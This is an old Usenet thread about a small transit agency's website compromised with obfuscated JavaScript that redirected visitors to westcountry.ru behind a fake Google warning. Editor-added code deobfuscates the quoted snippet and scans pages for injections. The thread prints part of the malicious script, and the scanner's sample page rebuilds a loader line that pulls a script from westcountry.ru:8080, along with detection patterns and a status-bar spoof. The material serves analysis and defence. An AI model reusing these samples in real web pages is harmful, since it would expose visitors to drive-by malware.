Infected Web Site?


Glen Labah, May 20, 2010, 2:46:45 AM

I am planning a trip to the west Puget Sound region, and was exploring
some of the public transit options there. When trying to access Kitsap
Transit's web site at http://www.kitsaptransit.org/
The web page appears, then disappears, and then I get the following
message:

Warning: Visiting this site may harm your computer

The website you are visiting appears to contain malware. Malware is
malicious software that may harm your computer or otherwise operate
without your consent. Your computer can be infected just by browsing to
a site with malware, without any further action on your part.

For detailed information about problems found on this site, or a portion
of this site, visit the Google Safe Browsing diagnostic page for
westcountry.ru

I am using Safari 4.0.5.

Unfortunately, Safari does not tell me what that Westcountry.ru URL is
all about. Certain other web browsers, when you position the pointer
over the URL, will tell you what the URL is actually going to direct you
to. Safari does not tell me that, so the actual location of the error
message URL is hidden. If I click on that it sounds like it might get
me to the actual malware site (westcountry.ru is obviously a rogue web
site of some sort) but it may also be a link to Google's Safe Browsing
Diagnostic Page for westcountry.ru.

Kitsap Transit is a fairly small transit agency, and their web site is
really only simple HTML and a few GIF images. Therefore, I don't see
how anything they have on their web site could be malware, unless
someone has invaded their web site and altered their HTML.

At the same time, it seems possible that something else may have been
installed on this computer by visiting some other web site that for some
bizarre reason is triggered by attempting to look at that particular
transit agency's web site, and is trying to maliciously redirect me to
westcountry.ru and is hoping that I would click on the link provided in
the "error message".

Any thoughts as to what this actually is?

Is the origin on my computer or on the transit agency's web site?

Thanks for any thoughts,

--
Please note this e-mail address is a pit of spam due to e-mail address
harvesters on Usenet. Response time to e-mail sent here is slow.

Király, May 20, 2010, 2:57:59 AM
In comp.sys.mac.system Glen Labah <gl4...@yahoo.com> wrote:
> Warning: Visiting this site may harm your computer

www.kitsaptransit.org works for me. What DNS server are you using?

--
K.

Lang may your lum reek.


Glen Labah, May 20, 2010, 3:34:56 AM
In article <X35Jn.4272$Z6.1798@edtnps82>, m...@home.spamsucks.ca (Király)
wrote:

> In comp.sys.mac.system Glen Labah <gl4...@yahoo.com> wrote:
> > Warning: Visiting this site may harm your computer
>
> www.kitsaptransit.org works for me. What DNS server are you using?

206.26.36.34
198.107.0.14

I found a reference that says this happens from time to time with
Safari, and to reset Safari and clean out the cache, and see what
happens. So, next up, that is what I will try.

Glen Labah, May 20, 2010, 3:44:24 AM
In article <1jis7jf.1q3x0u3jb6cmlN%sn...@spambin.fsnet.co.uk>,
sn...@spambin.fsnet.co.uk (Sn!pe) wrote:

> Sn!pe <sn...@spambin.fsnet.co.uk> wrote:
>
> > Király <m...@home.spamsucks.ca> wrote:
> >
> > > In comp.sys.mac.system Glen Labah <gl4...@yahoo.com> wrote:
> > > > Warning: Visiting this site may harm your computer
> > >
> > > www.kitsaptransit.org works for me
> >

> > Also for me, with no warnings from the Firefox Web Of Trust (WOT)
> > extension.
>
> *** CORRECTION ***
>
> I forgot to defeat Noscript in FF; it seems there is a script referring
> to <http://westcountry.ru/:8080> which does indeed trigger full
> red alerts in WOT.


I attempted to clear the Cache and delete the history, and it still
produced the alert message, and so this explains what is going on.

Thanks very much.

Unfortunately, for some reason my Safari doesn't allow me to select the
"view source" option, which would really help in determining what is
going on.

Glad it isn't my computer anyway.


AES, May 20, 2010, 10:05:34 AM
In article <gl4317-E9E5F9....@mail.eternal-september.org>,
Glen Labah <gl4...@yahoo.com> wrote:

>
> I am planning a trip to the west Puget Sound region, and was exploring
> some of the public transit options there. When trying to access Kitsap
> Transit's web site at http://www.kitsaptransit.org/
> The web page appears, then disappears, and then I get the following
> message:
>
> Warning: Visiting this site may harm your computer
>

I have seen exactly this same message half a dozen times recently when
clicking on links on various misc web sites -- don't recall what sites
exactly, as I do a lot of web searching, and no idea who's generating
the warning, but I just didn't push further on them. (Using latest
Safari on MacBook OS 10.4.11.)

Gerry, May 20, 2010, 11:14:21 AM
In article
<siegman-11173D...@bmedcfsc-srv02.tufts.ad.tufts.edu>,
AES <sie...@stanford.edu> wrote:

This is a feature that Google has to warn users that there are web sites
which have been infected by third parties, and you should be warned that
you might be infected by visiting this site.

It is useful to email the web site owner letting them know that their
site has been infected, many are unaware that they have been attacked in
this way.

AES, May 20, 2010, 11:41:52 AM
In article <everyday-D3915E...@mx02.eternal-september.org>,
Gerry <ever...@sunrise.net> wrote:

> > > Warning: Visiting this site may harm your computer
>
> This is a feature that Google has to warn users that there are web sites
> which have been infected by third parties, and you should be warned that
> you might be infected by visiting this site.
>
> It is useful to email the web site owner letting them know that their
> site has been infected, many are unaware that they have been attacked in
> this way.

Thanks. It indeed arises when I'm searching for some type of
information using Google.

[How does Google manage to do _all_ the incredible number
of things it does?!?!?]

Richard Maine, May 20, 2010, 12:24:45 PM
Gerry <ever...@sunrise.net> wrote:

> > In article <gl4317-E9E5F9....@mail.eternal-september.org>,
> > Glen Labah <gl4...@yahoo.com> wrote:
> > >
> > > When trying to access Kitsap
> > > Transit's web site at http://www.kitsaptransit.org/
> > > The web page appears, then disappears, and then I get the following
> > > message:
> > >
> > > Warning: Visiting this site may harm your computer

> This is a feature that Google has to warn users...

Yes, Google has a feature to warn about some known or highly suspect
malware sites, but that only applies when you click on a link in a
Google search. It also happens *BEFORE* you go to the site, rather than
after the site's web page appears as described above, which would be a
bit late to be useful. Google's world domination has not yet gotten to
the stage where they can directly intercede in 3rd-party web pages.

I will also absolutely guarantee you that Google does not have a message
telling you to go to some Google page at westcountry.ru. :-( :-( :-(

This message was clearly an attempt to make people think it was from
Google. Pretty lame attempt, but then plenty of people get caught by
equally lame things.

--
Richard Maine | Good judgment comes from experience;
email: last name at domain . net | experience comes from bad judgment.
domain: summertriangle | -- Mark Twain

BreadW...@fractious.net, May 20, 2010, 12:54:19 PM
Michelle Steiner <mich...@michelle.org> writes:
> In article <1jis97l.1pn2b0bxb6rrdN%sn...@spambin.fsnet.co.uk>,
> sn...@spambin.fsnet.co.uk (Sn!pe) wrote:
>
> > I did grab the source to look at it in TextWrangler and couldn't find an
> > explicit reference to westcountry.ru in it.
>
> Same here.

It's not explicit in the source text. It gets pulled in by a script.

If you look at the source text, there's a one-line script of
obfuscated javascript which generates the westcountry.ru URL. The
whole purpose of doing it that way is to make sure that you can't see
it when you look at the source code.

It's not worth de-obfuscating it, but I did paste the one-liner into
<http://jsbeautifier.org> to make it a little easier to look at. You
can see some of the bits of the bad URL broken up in the line towards
the top middle of the script which constructs the long string Y:

var Y = String("/go" + u("oglBawJ", 0, 3) + u("e-c6TKF", 0, 3) +
u("o-iNxa", 0, 3) + u("n/gJwH", 0, 3) + u("oogkynQ", 0, 3) +
u("RKole.oKR", 3, 3) + u("2tJHcomH2Jt", 4, 3) + "/li" +
u("l1XDfehl1DX", 4, 3) + "ack" + u("fm50er.fm50", 4, 3) + u("comr9uv",
0, 3) + ".ph" + u("MaTpTMa", 3, 1));

The function u() simply returns a substring of its first argument.
So u("oglBawJ", 0, 3) returns "ogl". The rest is there just to
confuse and annoy you. So do the u() calls in there and you get the
entire URL nice and easy. "/go" + "ogl" + "e-c" + "o-i", etc.

How that malware line got added to what looks like an otherwise
respectable page, I have no idea. It should be reported to the site
owner and the host.

--
Plain Bread alone for e-mail, thanks. The rest gets trashed.
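
Worked example (added by the editor; this is not code from the thread or from the
malware itself): the snippet quoted above can be reduced without ever running the
attacker's JavaScript. The helper u() is re-implemented from the description in
the post (a substring of its first argument; the "start, length" reading is an
assumption, cross-checked against the post's own u("oglBawJ", 0, 3) == "ogl" and
against u("RKole.oKR", 3, 3) having to yield "le." for the result to read
"google."). Every u(...) call is then replaced textually by the literal it
evaluates to, and the remaining literals are joined. The expression text is the
one pasted in the post; only the variable Y is shown there, so the result is a
path, not a full URL: the host and port are assembled elsewhere in the one-liner,
which the page does not reproduce.

```javascript
// Static reduction of the u()-based string construction quoted in the post.
// OBFUSCATED_EXPR is copied from the post; u() is re-implemented from the
// post's description and is the only part of the attacker's logic we run,
// and only on constant string arguments.

const OBFUSCATED_EXPR = `"/go" + u("oglBawJ", 0, 3) + u("e-c6TKF", 0, 3) +
u("o-iNxa", 0, 3) + u("n/gJwH", 0, 3) + u("oogkynQ", 0, 3) +
u("RKole.oKR", 3, 3) + u("2tJHcomH2Jt", 4, 3) + "/li" +
u("l1XDfehl1DX", 4, 3) + "ack" + u("fm50er.fm50", 4, 3) + u("comr9uv",
0, 3) + ".ph" + u("MaTpTMa", 3, 1)`;

// Assumed semantics: u(s, start, length). The post confirms u("oglBawJ", 0, 3)
// is "ogl"; a (start, end) reading would make u("RKole.oKR", 3, 3) empty.
function u(s, start, len) {
  return s.slice(start, start + len);
}

// Step 1: rewrite each u("...", a, b) call into the string literal it produces.
// The regex tolerates the line breaks the beautifier inserted inside a call.
function reduceCalls(expr) {
  return expr.replace(
    /u\(\s*"([^"]*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)/g,
    (_m, s, a, b) => JSON.stringify(u(s, Number(a), Number(b)))
  );
}

// Step 2: concatenate whatever string literals remain. No eval is involved;
// the expression is only ever treated as text.
function joinLiterals(expr) {
  const parts = [];
  const re = /"((?:[^"\\]|\\.)*)"/g;
  let m;
  while ((m = re.exec(expr)) !== null) {
    parts.push(JSON.parse(`"${m[1]}"`));
  }
  return parts.join("");
}

function deobfuscate(expr) {
  return joinLiterals(reduceCalls(expr));
}

const decodedPath = deobfuscate(OBFUSCATED_EXPR);
console.log("Y reduces to:", decodedPath);
```

Pasting a one-liner into a beautifier only reformats it; reducing the known
helper textually, as above, avoids evaluating attacker-controlled code at all.
Where a sample wraps the result in eval() or document.write() instead of plain
concatenation, treat those calls the same way: substitute what they would
receive and read it, rather than letting them execute.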

dorayme, May 20, 2010, 12:55:11 PM
In article
<michelle-1BF85A...@62-183-169-81.bb.dnainternet.fi>,
Michelle Steiner <mich...@michelle.org> wrote:

> In article <X35Jn.4272$Z6.1798@edtnps82>, m...@home.spamsucks.ca (Király)
> wrote:
>
> > > Warning: Visiting this site may harm your computer
> >
> > www.kitsaptransit.org works for me. What DNS server are you using?
>

> I get the same warning the OP gets; I'm using Safari 4.0.5, and have the
> fraudulent sites warning checkbox checked.

You can have this checked without the warning coming up (which
needs js enabled), by going to Develop menu, turning on things
and then turning them off. Next time you quit and restart Safari,
no warning.

--
dorayme


Glen Labah, May 21, 2010, 1:20:01 AM
In article
<michelle-AD1B92...@62-183-169-81.bb.dnainternet.fi>,
Michelle Steiner <mich...@michelle.org> wrote:

> In article <gl4317-E9E5F9....@mail.eternal-september.org>,
> Glen Labah <gl4...@yahoo.com> wrote:
>

> > Unfortunately, Safari does not tell me what that Westcountry.ru URL is
> > all about. Certain other web browsers, when you position the pointer
> > over the URL, will tell you what the URL is actually going to direct you
> > to. Safari does not tell me that,
>

> Yes it does; in the status bar at the bottom of the window.


I've not been able to con Safari into giving me a status bar at the
bottom of a window, but I'm fairly new at Safari.

Glen Labah, May 21, 2010, 1:29:34 AM
In article <yobocga...@panix3.panix.com>,
BreadW...@fractious.net wrote:

> How that malware line got added to what looks like an otherwise
> respectable page, I have no idea. It should be reported to the site
> owner and the host.


I've done that already, and this morning received a response that they
have their web site people working on it. Kitsap Transit is a pretty
low budget operation. One of the ferry services they operate (and in
fact one of the services they operate that I have ridden) is with a boat
that was built in 1917 simply because there isn't the money to replace
it with something a bit more modern.

So, they probably don't have the money for the best of the Seattle
area's web site security people.

BreadW...@fractious.net, May 21, 2010, 1:34:22 AM
Glen Labah <gl4...@yahoo.com> writes:
> In article <yobocga...@panix3.panix.com>,
> BreadW...@fractious.net wrote:
>
> > How that malware line got added to what looks like an otherwise
> > respectable page, I have no idea. It should be reported to the site
> > owner and the host.

> I've done that already, and this morning received a response that they
> have their web site people working on it. Kitsap Transit is a pretty

I hope you'll let us know what develops. It really is odd - either
someone at the hosting company put it there, or somewhere there's lax
security which allowed the files at their webhost to be modified.
Should be interesting to find out the story.

BreadW...@fractious.net, May 21, 2010, 1:37:40 AM
Glen Labah <gl4...@yahoo.com> writes:

> Michelle Steiner <mich...@michelle.org> wrote:
> > Glen Labah <gl4...@yahoo.com> wrote:
> >
> > > Unfortunately, Safari does not tell me what that Westcountry.ru
> > > URL is all about. Certain other web browsers, when you position
> > > the pointer over the URL, will tell you what the URL is actually
> > > going to direct you to. Safari does not tell me that,

> > Yes it does; in the status bar at the bottom of the window.

> I've not been able to con Safari into giving me a status bar at the
> bottom of a window, but I'm fairly new at Safari.

View->Show Status Bar
or cmd-/

That said, not all sites will give you trustworthy information on the
status bar. It's trivial to override it in Javascript.

Firefox lets you restrict some of what Javascript can do - I don't
allow Javascript to modify the content of the status bar (or hide it
or a couple of other things). AFAIK, Safari doesn't allow you to
selectively disable JS functions.

Wes Groleau, May 21, 2010, 1:28:11 PM
On 05-21-2010 01:34, BreadW...@fractious.net wrote:
> I hope you'll let us know what develops. It really is odd - either
> someone at the hosting company put it there, or somewhere there's lax
> security which allowed the files at their webhost to be modified.
> Should be interesting to find out the story.

I had a similar hacking on one of my GoDaddy hosted websites.
Obfuscated Javascript was added which re-routed viewers to
a website in Russia showing off pictures of "my new baby"

It looked like that website had also been hacked for
malicious purposes, but since all the text was in English,
I think it may have been a decoy.

--
Wes Groleau

Race Doesn't Matter
http://Ideas.Lang-Learn.us/WWW?itemid=876

Glen Labah, May 22, 2010, 3:59:41 AM
In article <yobtyq1...@panix3.panix.com>,
BreadW...@fractious.net wrote:


Can't tell you the whole story, but they have removed the offending
script from the web site, as it is no longer in the source HTML.
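
Worked example (added by the editor, not part of the thread): "it is no longer in
the source HTML" is the right check, and it can be done mechanically for every
page on the site rather than by eye on the front page. The scanner below pulls
each inline script out of an HTML document and flags the tells seen in this
thread: a single very long line, document.write() of a split-up script tag, a
reference to port 8080, and eval/unescape/fromCharCode. It also covers the
status-bar caveat raised earlier in the thread by reporting anchors whose
onmouseover sets window.status to something other than the href. Both sample
pages, the injected one-liner inside them, the indicator list and the line-length
threshold are constructed for this example; nothing here is the real Kitsap
Transit markup.

```javascript
// Heuristic scan for injected inline scripts and status-bar spoofing in
// otherwise static HTML. Sample pages are constructed for this example.

const CLEAN_PAGE = `<html><head><title>Routes</title></head>
<body><img src="logo.gif"><a href="routes.html">Routes</a></body></html>`;

// Constructed compromised page: an obfuscated one-liner modelled on the one
// discussed in the thread, plus an anchor that lies about its destination.
const INJECTED_PAGE = `<html><head><title>Routes</title></head>
<body><img src="logo.gif">
<a href="http://westcountry.ru:8080/" onmouseover="window.status='http://www.kitsaptransit.org/routes.html';return true">Routes</a>
<script>function u(s,a,b){return s.substr(a,b)};var Y=String("/go"+u("oglBawJ",0,3)+u("e-c6TKF",0,3)+u("o-iNxa",0,3)+".ph"+u("MaTpTMa",3,1));var h=u("weKLMN",0,2)+"stcountry.ru:8080";document.write('<scr'+'ipt src="http://'+h+Y+'"></scr'+'ipt>');</script>
</body></html>`;

// Indicator list (assumed, not exhaustive): each is a cheap textual tell for
// dropper-style injections. Tune for the site you are checking.
const INDICATORS = [
  { name: "eval-or-unescape", re: /\b(eval|unescape|String\.fromCharCode)\s*\(/ },
  { name: "document.write-of-script-tag", re: /document\.write\s*\([^)]*scr/i },
  { name: "split-script-tag", re: /['"]<scr['"]\s*\+\s*['"]ipt/i },
  { name: "nonstandard-port-8080", re: /:8080\b/ },
];

// Assumed threshold: a legitimate hand-written page rarely carries a single
// 150+ character line of script; minified libraries would need an allow-list.
const LONG_LINE = 150;

function extractInlineScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

function scanScript(body) {
  const hits = [];
  const lines = body.split("\n").filter((l) => l.trim().length > 0);
  if (lines.length === 1 && lines[0].length > LONG_LINE) hits.push("long-single-line");
  for (const { name, re } of INDICATORS) {
    if (re.test(body)) hits.push(name);
  }
  return hits;
}

// Returns one entry per suspicious inline script: { script: index, hits: [...] }.
function scanPage(html) {
  const report = [];
  extractInlineScripts(html).forEach((body, i) => {
    const hits = scanScript(body);
    if (hits.length > 0) report.push({ script: i, hits });
  });
  return report;
}

// Anchors that set window.status on mouseover to a value different from their
// href are showing the user a destination they will not actually visit.
function findStatusBarSpoofs(html) {
  const spoofs = [];
  const tagRe = /<a\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[0];
    const href = /\bhref\s*=\s*"([^"]*)"/i.exec(tag);
    const shown = /window\.status\s*=\s*'([^']*)'/i.exec(tag);
    if (href && shown && href[1] !== shown[1]) {
      spoofs.push({ href: href[1], shown: shown[1] });
    }
  }
  return spoofs;
}

console.log("clean:", JSON.stringify(scanPage(CLEAN_PAGE)));
console.log("injected:", JSON.stringify(scanPage(INJECTED_PAGE)));
console.log("spoofed links:", JSON.stringify(findStatusBarSpoofs(INJECTED_PAGE)));
```

Run it over every HTML file the host serves, not just the front page: an
injection that reached one file usually reached the rest. A clean scan is
evidence, not proof; the authoritative check is a diff against a known-good copy
of the site, and the underlying problem is whatever let the files be written
(typically stolen FTP or hosting-panel credentials), which removing the script
does not fix.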


J Burns, May 22, 2010, 8:56:55 AM
I wonder how you got the warning so soon. Google says it didn't find
anything suspicious until 5/21:
http://www.google.com/safebrowsing/diagnostic?site=westcountry.ru

J Burns, May 22, 2010, 12:45:56 PM
Michelle Steiner wrote:
> In article <ht8kap$258$1...@news.eternal-september.org>,

> J Burns <bur...@nowhere.com> wrote:
>
>> I wonder how you got the warning so soon. Google says it didn't find
>> anything suspicious until 5/21:
>> http://www.google.com/safebrowsing/diagnostic?site=westcountry.ru
>
> It says the *last* time it found something suspicious was 5/21:
>
>
"Part of this site was listed for suspicious activity 1 time(s) over the
past 90 days."